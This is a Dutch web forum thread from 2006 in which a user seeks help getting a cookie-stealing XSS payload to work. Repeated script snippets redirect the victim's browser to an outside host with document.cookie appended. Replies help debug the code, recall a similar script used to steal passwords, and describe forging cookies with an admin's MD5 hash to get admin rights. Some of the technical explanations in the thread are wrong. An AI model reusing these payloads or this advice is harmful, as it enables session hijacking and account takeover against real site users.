Forum » Javascript » [js] document.cookie

  1. Fastfox

    Heey,

    waarom werkt dit niet?

    Code
    1
    
    <script>document.location.replace(\"http://www.blaat.nl?q=\"+document.cookie);</script>



    foutmelding, er gebeurd gewoon niets.
    zonder document.cookie werkt die wel, maar het gaat nou om die cookie.

    wat doe ik fout en hoe moet het wel?

    bedankt


    Showroom
    do 13-04-2006 om 18:06
Reacties (16)

Reageren
  1. Saven

    1) cookies stelen is zo 2001
    2) je moet document.location gebruiken

    do 13-04-2006 om 18:09
  2. Tim

    Foutmelding?

    En wat werkt er niet? Staat de cookie er dan niet bij, heb je waarschijnlijk geen cookie gezet...

    Zet overigens een language=\"javascript\" type=\"text/javascript\" erbij in je script tag...

    Wees eens wat duidelijker...

    Quote: saven
    2) je moet document.location gebruiken
    Nop, dit is net zoiets als header in PHP, als je op de Vorige knop ramt dan komt die pagina niet meer te voorschijn.

    Weet je btw nog dat dit bij jou ook niet werkte:\')...

    Bewerkt door Tim op do 13-04-2006 om 18:12
    do 13-04-2006 om 18:10
  3. Fastfox

    Quote: saven

    1) cookies stelen is zo 2001
    2) je moet document.location gebruiken

    1) maar wel handig.
    2) geen verschil.


    Showroom
    do 13-04-2006 om 18:12
  4. Saven

    Quote: michielfm

    [..]
    1) maar wel handig.
    2) geen verschil.
    Dan is je cookie leeg waarschijnlijk..

    btw, als je dit al niet eens normaal werkend kan krijgen... hoe wil je dan ooit tof gaan doen dat je een website hebt \"g3h4x0rd\" >_> :\')

    do 13-04-2006 om 18:16
  5. Sensei

    Probeer dit is:

    Code
    1
    
    document.location = \"http://blaat.com?q=\"+document.cookie;

    Quote: snake86
    [..]Nop, dit is net zoiets als header in PHP, als je op de Vorige knop ramt dan komt die pagina niet meer te voorschijn.

    Weet je btw nog dat dit bij jou ook niet werkte:\')...
    Lijkt me stug dat je daar cookies voor nodig hebt. Een zelfde soort script is ooit gebruikt voor pass steal actie op ML.

    Bewerkt door Sensei op do 13-04-2006 om 18:19
    --> Quick Reply for ML 0.5.1!!! <--
    Last update: 10-02-2009
    do 13-04-2006 om 18:18
  6. Fastfox

    Quote: saven

    [..]Dan is je cookie leeg waarschijnlijk..

    btw, als je dit al niet eens normaal werkend kan krijgen... hoe wil je dan ooit tof gaan doen dat je een website hebt \"g3h4x0rd\" >_> :\')

    de cookie is niet leeg. en de fout zit waarschijnlijk in die document.cookie, want zonder werkt die wel alleen zie je de cookies niet.

    en 2 daar vroeg ik niet om. en lees nou dat snake zegt dat het jou ook niet lukte

    @ snake

    ik krijg geen foutmelding maar het werkt gewoon niet, er is geen resultaat. en ik zal proberen wat je zei.

    Volgend bericht ( Donderdag 13-04-2006 om 18:31 ) :
    Quote: sensei

    Probeer dit is:
    [..][..]Lijkt me stug dat je daar cookies voor nodig hebt. Een zelfde soort script is ooit gebruikt voor pass steal actie op ML.


    waar wel cookies gezet word, werkt het niet (ook de redirect niet)
    en waar geen cookies gezet zijn, werkt de redirect wel, maar de coockies zijn leeg dus.

    dus waarschijnlijk zal het dus wel beveiligd zijn ofzo
    ik probeer wel een andere manier. bedankt

    Bewerkt door Fastfox op do 13-04-2006 om 19:25
    Showroom
    do 13-04-2006 om 18:22
  7. Tim

    Quote: sensei
    Lijkt me stug dat je daar cookies voor nodig hebt. Een zelfde soort script is ooit gebruikt voor pass steal actie op ML.
    Ik had het ook over document.location en document.location.replace...
    En sowieso bijna alle wachtwoorden staat tegenwoordig in MD5...

    Bewerkt door Tim op do 13-04-2006 om 18:34
    do 13-04-2006 om 18:33
  8. Saven

    Quote: snake86

    [..]Ik had het ook over document.location en document.location.replace...
    En sowieso bijna alle wachtwoorden staat tegenwoordig in MD5...
    Maar als je slim bent kun je je cookie aanpassen en zo, als je een pass hebt van een admin, adminrechten krijgen

    do 13-04-2006 om 18:42
  9. Fastfox

    Quote: saven

    [..]Maar als je slim bent kun je je cookie aanpassen en zo, als je een pass hebt van een admin, adminrechten krijgen

    h?, dat herken ik.

    Volgend bericht ( Vrijdag 14-04-2006 om 13:00 ) :
    ik wil nog ff zeggen dat het me nog steeds niet lukt
    terwijl als ik dit doe: <script>alert(document.cookie);</script>
    dat hij wel de cookies laat zien.


    Showroom
    do 13-04-2006 om 19:12
  10. Tim

    Quote: michielfm
    terwijl als ik dit doe: <script>alert(document.cookie);</script>
    dat hij wel de cookies laat zien.
    , probeer eens in een variable te zetten:
    Code
    1
    2
    3
    4
    
    <script language=\"javascript\" type=\"text/javascript\">
    var koekje = document.cookie;
    document.location.replace(\"http://www.blaat.nl/?pagina=\"+koekje);
    </script>

    vr 14-04-2006 om 16:11
  11. Kecin

    Quote: saven

    [..]Maar als je slim bent kun je je cookie aanpassen en zo, als je een pass hebt van een admin, adminrechten krijgen

    Dat werkt niet meer enzo.


    I A M T H E L A W .
    vr 14-04-2006 om 18:15
  12. Fastfox

    Quote: snake86

    [..], probeer eens in een variable te zetten:
    [..]

    nope werkt ook niet

    ik heb nou de url en de \" weggehaalt zodat alleen de cookie overblijft, en dat werkt dus wel dus krijg je http://originele site/cookies.

    Code
    1
    2
    3
    4
    5
    
    <script language=\"javascript\" type=\"text/javascript\">
    var koekje = document.cookie;
    var site = \"http://blaat.com\";
    document.location.replace(site+koekje);
    </script>


    dit werkt dus ook niet dus alles binnen die \" zorgt ervoor dat het fout gaat

    Volgend bericht ( Vrijdag 14-04-2006 om 19:02 ) :
    ok? ik heb het gevonden.
    Code
    1
    
    <script>document.location.replace(\'http://www.site.be/?q=\'.concat(document.cookie));</script>


    het lag aan:
    1) concat doet iets
    2) die punt.


    maarja bedankt allemaal voor de moeite

    Bewerkt door Fastfox op vr 14-04-2006 om 18:40
    Showroom
    vr 14-04-2006 om 18:37
  13. Tim

    Quote: michielfm
    het lag aan:
    1) concat doet iets
    2) die punt.


    maarja bedankt allemaal voor de moeite
    Volgens mij kan het daar nooit aan liggen want concat voegt alleen maar array\'s bij elkaar als ik het niet verkeerd heb en die punt bestaat niet eens in Js, dat moet een + zijn...
    2999 + 1 posts

    Bewerkt door Tim op vr 14-04-2006 om 19:46
    vr 14-04-2006 om 19:45
  14. Fastfox

    Quote: snake86

    [..]Volgens mij kan het daar nooit aan liggen want concat voegt alleen maar array\'s bij elkaar als ik het niet verkeerd heb en die punt bestaat niet eens in Js, dat moet een + zijn...
    2999 + 1 posts


    oh ok?... vreemd maarja boeiend het werkt nou en ben er blij mee.

    Bewerkt door Fastfox op vr 14-04-2006 om 22:30
    Showroom
    vr 14-04-2006 om 22:04
  15. Stakker

    Quote: snake86
    En sowieso bijna alle wachtwoorden staat tegenwoordig in MD5...

    Als je lid-id weet (of hoe dat dan ook in je koekje mag staan) en je weet het md5-wachtwoord bij dat id; dan kun je je cookie aanpassen en heb je niet eens het gewone wachtwoord nodig. :\')

    vr 14-04-2006 om 22:12
Reageren